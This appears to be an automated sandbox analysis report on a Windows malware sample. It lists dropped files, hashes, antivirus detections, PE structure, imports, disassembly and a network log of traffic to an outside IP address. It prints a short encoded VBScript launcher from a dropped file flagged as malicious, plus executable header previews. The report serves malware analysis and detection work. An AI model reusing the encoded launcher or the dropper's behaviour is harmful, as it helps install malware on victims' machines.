                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):154
                            Entropy (8bit):5.614624794634796
                            Encrypted:false
                            SSDEEP:3:cBc8BBt/giiYhRD7GRLCnkSjsVWxyAUjI312vAGcCpYr2xiUdqJdn:cBjN3HD7GRSkQ1sjI2KixiEMdn
                            MD5:D25ABFBDB53986A76D2E91619515E94B
                            SHA1:059306BB7234709E1B826B215F24C5561ED6A9EA
                            SHA-256:35FB906845BCF87A2421D62B7E27AEF8763BB4DEE99BD481D7181D5197A38275
                            SHA-512:B88DF941C731D7893068FE326596E57C0EF9C0ED02291E2B04234757E73EA8C259B87A7069453E0FF8A900AAA87543E6D83D353CA52E3CC92C904E48C9F9927B
                            Malicious:false
                            Preview:5lCSyb9W0OFdHZOGiV173GdgDkedz4MAPmagmXmXCjAv97hqcvw6pgPzIgON7fh6CFNe8rdLsd4UFrgFDxBEIQVsXlYGIYahCEt4tCsvRlNLm4ta9JKJecyvteGXSXCTDXSA8mVAFQwgDJGc18G8ORCjQ8
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):773
                            Entropy (8bit):5.88188550946202
                            Encrypted:false
                            SSDEEP:24:2H1Kni1gTAx6cexSqZrFMp4xP6kokJMjdrcf:QKmgDZk4xPZoAMjpcf
                            MD5:44C69EB09C48C916E503CE08DF5C4A0A
                            SHA1:5B8EA8066FB5DBD65076B0CDF2E53281EA05AE1A
                            SHA-256:AF9F089D501BED940AE6ED794E165E76B2E077020A4A9516528131537C52050C
                            SHA-512:D29B7F2723A43AAA7519CFBEA3D1946C01932BAC755819A2B5EA779DD20312BF1294956E0995F185EA0FA6AB47B914DF485E4BA0839B459584288EA6338AB061
                            Malicious:false
                            Preview:pvJqWeLx3GiWPAI9G138TsFZywcpqI7l9lWfjDW4TFxRN6IHk7iGnTc7qu1kBfHuI7WoomaCe8oN4xL2oVFtk18qJYyzMw3x8CIQjec7hflooOC2j95qaXKR9qfPyl0sF1P1p4TK3ILEPTB5W6PN1MXk21Q28MJ5p3jx9KNopvwRMFBqpk31Vm02eo9xoaLq9PYWtO5LtlhFZFYx0kNYTRkCCrTVLZAPkGS6qp6borIuFvcYPM7EMwXrpVTC4kATkRfTwcGKnwulI07RO4F9c6DxtkQVW4gDrzJxPJlwFwaZCwizYBy9fB0oOskLLuytQq3TqJBFTS3qfnu7Cb6UFgiq8ejhiZlV7rIV2PIOAsqMIKJk7nJuyenuINULkeg3risyeZEwSrUXzWiyV8k5P0gdDYNo57ofMwejbUGhiXbGJQ4wpfzm3kn1BOuGMa1VDyLD18WA2CX2YaTxea9ZHCmlIniMkAVIfGDVF14rIyt1Nvck56lvacNAMj4OZKa1rPWRX8sngSQTSuXXL7RnYkrD3CJf6qR8Y1K7YKN6O8OIL4rbMgDb2wdGiSYUzNq0AR4akZ8AuUZaVi29VrSamzGlYDZGw3HARYH39R0wiCrhWCv9aY9H4QNLLSCh92N0NZI6b8AD1g1jHiPVRapY39FBK6rqPTwpy0T73yibY5QXYnDmDqPjMz6NTHveQUyhuMuQPScd2NA8tsnh3FmjDNd94GnwCDLDGsnM2wXvOwq9z8eleOlLrPehtvWIopazC61AF
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):402
                            Entropy (8bit):5.875646102875155
                            Encrypted:false
                            SSDEEP:6:hwXJCT93EfPWpqBWxg6wGyxNCigxRnwo75OcbOLwFvxD+PXRKDHYZQEW2HMn:ICyMqwGNChRn3NqLG5q/RcHkgn
                            MD5:7734AF8B276980372DA8BE8AA89AB8B3
                            SHA1:6D1681C0B7B62DABAAE9EBD46295204DD8400E91
                            SHA-256:CCA27072E563DDBF09DBAB445473049555FA54BFD69A9007ECA4F2A5E35C22E2
                            SHA-512:4EF5E0F8CA8A5EF77B3CC6D23A9B6D2D5A58DD00ADEAD06AE5D14BA41ECD3BF5863E22C06C58C5E199D8927B7AA472AF3FAE84673681BF63125491957F90D6D3
                            Malicious:false
                            Preview:5iXxRGQqVqBQ2z7Z1c9zk0EikaRNRO7yKnv4SXaXBmNAPCvpFEQlLwxFeyN0zDZGtNGPEDGeCly8mDThpmHM7WnX0pZdKji8NGQC6flB7wij8zdafpLM5MJWksYYnmUcC0ugwRlJBFPLxDZAM98eXWCA64bNHMXUcFgIE6nOECL078jhTYLoozFqytj2zYCys4srgQ5PWtaVKMD8V43sAtqmAzTUXuYqAWHCP1BCc6R4Yufmqkh4eTx8OFrq7k1lUuUyEAsd30QEbvOQUrowNeLriJyJKUF1EqkoZrip1DBnCtgc1aWP6FY0inQ4LjTivYAvLj0mJ94JchozmWRt8059RtFwbndSuc2nsuRSktF7KOYB9aRzRjj4dBdbeELgfmZ9pAG1E9IPu8yDVE
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):47
                            Entropy (8bit):4.266730872678045
                            Encrypted:false
                            SSDEEP:3:I5gTlMkjLYjWJ:Iwlp3Yje
                            MD5:665BDA14C5E0F28A4FCAAB8726DC6EBE
                            SHA1:16DEB93757751E2D66E05C2C22505DB113FA96BA
                            SHA-256:09C3E02A4CAAD39E7C91F0BA1CC93C8C727D23B306DA9129CCA1D0955880C33E
                            SHA-512:51E85507A8C515FB3FE854A5D969C83D4C6ADD05284A11232B773EEBD19BA2B148B01CE116D65D6BF7CDFC13064ABFF8F0E69825630446E00B7846EB16ED8CB5
                            Malicious:false
                            Preview:"C:\comproviderRuntimecommon\chainsavesref.exe"
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):965
                            Entropy (8bit):5.895969511903032
                            Encrypted:false
                            SSDEEP:24:zMVH2Kc2dETTXdla3efM2QfnZ6qHy8ikD5Fk6KlRw34Y5:zYo2CXdieb+Z6qHy8hND
                            MD5:B052857C9DE3DD65305100232C55ECF0
                            SHA1:5789A2644F17F918F162833FE4977F7139A5C132
                            SHA-256:A3BC14FFE5D7BD3FD68E643E3CC08A101E06659B2E2B30AA57D65C44CE156D90
                            SHA-512:2DA5D25FCB1B0D7AEE2275B7E4336DE8D9DE80B3C0999D6C6752DB114CF3ED9E46826F4608A90D8FEA6A058D9DA4CCAB8F4DC1D4CA594CE30A52092C2DA28599
                            Malicious:false
                            Preview:KrR0xghjbizYV9UavRaUJfMaGaRLL1kOHrzZkOMmrLgQO7sxq52ttixpf0tXOWYk7kRoJ4zhFym885MJrefP81ej3K4tezYVx5TnqEnvFVo55zqjokpt0ImGFru8AFCQZRLDmidn0uKmMinEeVF3KoepTMh8Upu9TYgnom6FHB3G793hDqepAIFuwfuZBeTL9KTyCAZ1Y9wIvYrTTA4nKF8KSv1I2gEmsrHxpEeDQnQAW79YyaGAkpB3LJgQJR815JaDQ4oOf0Xhy7yUwcTbaDBCqNlgiN49oYFMh5H4w2fuSdENVLeq7hb2HXWCSHpS6Y2Z2lx0VYphiRuMIXLXsOBH6NEJiEloMMy3lpVtXoVj13U0nK456RjsWvcphoRQwAVVd0ldBbAE2cPC3OgYKqs4nGgzMqLtWEw0i8Wwia4eRez4fawTH3FGSasXTwRVQRsxqYe41t0uwNnIQmTw32lc9piIP8cwIiO9wBOH51bXCVUFwkHrcfbYpPyA0Wo3QEmN8nWPXM0CaOanVcVp1vTmG0UgMNQjNiG8tGGIO2TQpZ7bzKpXA8Bfu9HITzCJ5Qy2Hb4OWMb9cC7q32qCi3jOglOt98yYzJVYkEUYQbBxhCCsCaObIAlCrkWgMLOXYDJTriFyiSwH2vqdigqjtXPziTrAsyLEMnZe2tAeUa20OdJ5427qepoAxTvX1FGuGr5OWMlyfMOTeYlEJvGz0fkg8Yqi8mmOTIugi4jrRILRbVfYsqOG9R3kGYQ7fC02k99VoEfOLYisUTEn3R0RYgOCPJaJolMPSSrbVJunLA4ltLQxTmENLieDv7GeoVjkMSaBlnStgNGYmnTE3mzCh8EtxnqXDQ8zaUZauOLqTVq7cGaIoClCghCNOqO775pQPQ7SN2TobJsMRGRrNhtAp6T3RLLEANsYparLII4vt6lWy06HZguZMplT6EACqPoNaUg1Z
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):221
                            Entropy (8bit):5.869799958312498
                            Encrypted:false
                            SSDEEP:6:G5kgwqK+NkLzWbHa/818nZNDd3RL1wQJRrbXb79x5BD9ZpWS1:G6BMCzWLaG4d3XBJhfbb1
                            MD5:57F4CBF8C281ACDE2C48327DFB2B3C45
                            SHA1:F752FF26E32BED28F91712E5322D438ADAE0D6F4
                            SHA-256:0864BAA556ADDDC451E8AD0ACBDFBAF692A7371A5CBB8EF2B2B83AA05C56FB39
                            SHA-512:CF9EF8920DF9E3BD5CB9F907616C48BF0267DF974987774495F84D49999E54A626F96B8221DDA23ABBED5E753C1F53725FFE896A43B0CBA41EE0EACDC1F6BDDB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJmGswMW\bN..I!xOks+^Gs:W.&fdSk"X1Mt:d&X uu(oWmc8lDJS~Z~PWC^/nvT4AAA==^#~@.
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.441074143240984
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            • Win32 Executable (generic) a (10002005/4) 49.97%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:cDouNOFXle.exe
                            File size:1232540
                            MD5:54172888b473f2515b13fe1e2032a112
                            SHA1:fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
                            SHA256:05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
                            SHA512:d09ce140712a46f3f94eaaf0c567ca30ce6de8b81ed8b45961cf6f4211225b43e6944dba769c212e11f836cf579932883a28d798353af9d6bd71c40e8a8f90a5
                            SSDEEP:12288:WRZ+IoG/n9IQxW3OBseWyx/bl84s165YnPKDGWcvOarVwvZDyg7VGNtImleJS:Q2G/nvxW3Ww4DW1IDGWcmarVKFPJS
                            TLSH:AE454B017E44CE52F0181633C2FF45988BB4A9503AA6E31B7EB9377D65223967C0DADB
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                            Icon Hash:fbb99bdaecbcdce8
                            Entrypoint:0x41ec40
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                            Instruction
                            call 00007FFA04AE8CB9h
                            jmp 00007FFA04AE86CDh
                            cmp ecx, dword ptr [0043E668h]
                            jne 00007FFA04AE8845h
                            ret
                            jmp 00007FFA04AE8E3Eh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push esi
                            push dword ptr [ebp+08h]
                            mov esi, ecx
                            call 00007FFA04ADB5D7h
                            mov dword ptr [esi], 00435580h
                            mov eax, esi
                            pop esi
                            pop ebp
                            retn 0004h
                            and dword ptr [ecx+04h], 00000000h
                            mov eax, ecx
                            and dword ptr [ecx+08h], 00000000h
                            mov dword ptr [ecx+04h], 00435588h
                            mov dword ptr [ecx], 00435580h
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            lea eax, dword ptr [ecx+04h]
                            mov dword ptr [ecx], 00435568h
                            push eax
                            call 00007FFA04AEB9DDh
                            pop ecx
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 0Ch
                            lea ecx, dword ptr [ebp-0Ch]
                            call 00007FFA04ADB56Eh
                            push 0043B704h
                            lea eax, dword ptr [ebp-0Ch]
                            push eax
                            call 00007FFA04AEB0F2h
                            int3
                            push ebp
                            mov ebp, esp
                            sub esp, 0Ch
                            lea ecx, dword ptr [ebp-0Ch]
                            call 00007FFA04AE87E4h
                            push 0043B91Ch
                            lea eax, dword ptr [ebp-0Ch]
                            push eax
                            call 00007FFA04AEB0D5h
                            int3
                            jmp 00007FFA04AED123h
                            jmp dword ptr [00433260h]
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push 00421EB0h
                            push dword ptr fs:[00000000h]
                            Programming Language:
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2015 UPD3.1 build 24215
                            • [EXP] VS2015 UPD3.1 build 24215
                            • [RES] VS2015 UPD3 build 24213
                            • [LNK] VS2015 UPD3.1 build 24215
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x1e494.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000x2268.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x310ea0x31200False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x330000xa6120xa800False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x3e0000x237280x1000False0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didat0x620000x1880x200False0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x630000x1e4940x1e600False0.2540991512345679data6.688895303072544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x820000x22680x2400False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            PNG0x636140xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                            PNG0x6415c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                            RT_ICON0x657080x1514PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                            RT_ICON0x66c1c0x10828data
                            RT_ICON0x774440x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4284900196, next used block 4284900196
                            RT_ICON0x7b66c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4283782754, next used block 4285426547
                            RT_ICON0x7dc140x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4286412417, next used block 4285688944
                            RT_ICON0x7ecbc0x468GLS_BINARY_LSB_FIRST
                            RT_DIALOG0x7f1240x286dataEnglishUnited States
                            RT_DIALOG0x7f3ac0x13adataEnglishUnited States
                            RT_DIALOG0x7f4e80xecdataEnglishUnited States
                            RT_DIALOG0x7f5d40x12edataEnglishUnited States
                            RT_DIALOG0x7f7040x338dataEnglishUnited States
                            RT_DIALOG0x7fa3c0x252dataEnglishUnited States
                            RT_STRING0x7fc900x1e2dataEnglishUnited States
                            RT_STRING0x7fe740x1ccdataEnglishUnited States
                            RT_STRING0x800400x1b8dataEnglishUnited States
                            RT_STRING0x801f80x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                            RT_STRING0x803400x446dataEnglishUnited States
                            RT_STRING0x807880x166dataEnglishUnited States
                            RT_STRING0x808f00x152dataEnglishUnited States
                            RT_STRING0x80a440x10adataEnglishUnited States
                            RT_STRING0x80b500xbcdataEnglishUnited States
                            RT_STRING0x80c0c0xd6dataEnglishUnited States
                            RT_GROUP_ICON0x80ce40x5adata
                            RT_MANIFEST0x80d400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                            DLLImport
                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSource PortDest PortSource IPDest IP
                            Aug 6, 2022 00:53:01.311467886 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.377403021 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.377499104 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.378452063 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.443624020 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444070101 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444111109 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444153070 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444191933 CEST4977980192.168.2.3141.8.195.65
